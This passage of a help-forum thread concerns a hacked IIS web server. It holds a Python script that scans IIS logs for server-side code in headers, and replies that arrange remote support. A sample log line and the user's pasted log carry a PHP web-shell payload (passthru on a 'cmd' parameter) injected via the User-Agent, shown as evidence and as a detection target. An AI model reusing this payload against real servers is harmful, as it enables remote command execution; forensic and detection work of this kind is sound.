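2010-01-09 04:03:06 W3SVC1 server1 192.0.2.10 GET /x.html - 80 - 203.0.113.99 Mozilla/5.0+(Windows;+U)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - example.test 200 0 0 609
"""

# Markers of server-side code inside a header value (assumed list, extend as needed).
CODE_IN_HEADER = re.compile(
    r"<\?|<%|\$_(GET|POST|REQUEST)|passthru\(|system\(|eval\(", re.I
)


def parse_w3c(text):
    """Yield one dict per request, honouring every '#Fields:' directive.

    IIS repeats the header block whenever the service restarts, so the field
    list is re-read each time it appears.
    """
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            values = line.split()  # IIS writes spaces inside a field as '+'
            if len(values) == len(fields):  # skip truncated or wrapped lines
                yield dict(zip(fields, values))


def suspicious_clients(text):
    """Map client IP -> list of (date, time, uri, status) for flagged requests."""
    hits = defaultdict(list)
    for row in parse_w3c(text):
        headers = row.get("cs(User-Agent)", "") + " " + row.get("cs(Referer)", "")
        if CODE_IN_HEADER.search(headers):
            hits[row["c-ip"]].append(
                (row["date"], row["time"], row["cs-uri-stem"], row["sc-status"])
            )
    return dict(hits)


if __name__ == "__main__":
    for ip, requests in sorted(suspicious_clients(SAMPLE_LOG).items()):
        print(ip, len(requests), "flagged requests")
        for date, time_, uri, status in requests:
            print("   ", date, time_, uri, status)
```

The resulting IP list and timestamps give a window for reviewing file modification times in the web roots and the other log sources on the server.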
 
SjoerdHCommented:
It is a small question but a very difficult answer.

The bottom line is that the hacker needs to find a place where he can write a file on your server, which he can then execute. What you see in your log is more or less a brute-force method to find out what there is on your server and where the possibly vulnerable places are.

You can find interesting reading at:

http://www.bright-shadows.net/tutorials/tbs_wiwa.txt
http://www.enye-sec.org/en/papers/web_vuln-en.txt
0
 
sitgAuthor Commented:
Thanks sir,

Kindly check the following, where he added the code on the server.
The two hackers are working from different IPs; they infected many websites three times on the server.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> http://test.com/x.html test.com 200 0 0 328
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

My server is still not stable; many times its bandwidth goes above 100 mbps and I am not able to restart any application or reset a terminal session;
finally it required a hard boot.
Kindly suggest how I can get their footprint, which is still available on the server, and whether there is any chance to remove the backdoor.

Warm regards,
Naresh


0
 
SjoerdHCommented:
Dear Naresh,

Do you have the complete file posted above? This one is not complete. I want to get a picture of what they can do on your server.
For a good picture of how to solve this I need access to your server.

Regards,
S
0
 
sitgAuthor Commented:
Kindly give your email ID.
I can give you a TeamViewer account.

0
 
sitgAuthor Commented:
Sorry, I can give you TeamViewer access.
0
 
SjoerdHCommented:
We use Bomgar:

Go to support.exs.nl

and use this session key: RXH9696
0
 
sitgAuthor Commented:
In that case give me 1-2 working days.
I am working to free this server ASAP.

Naresh
0
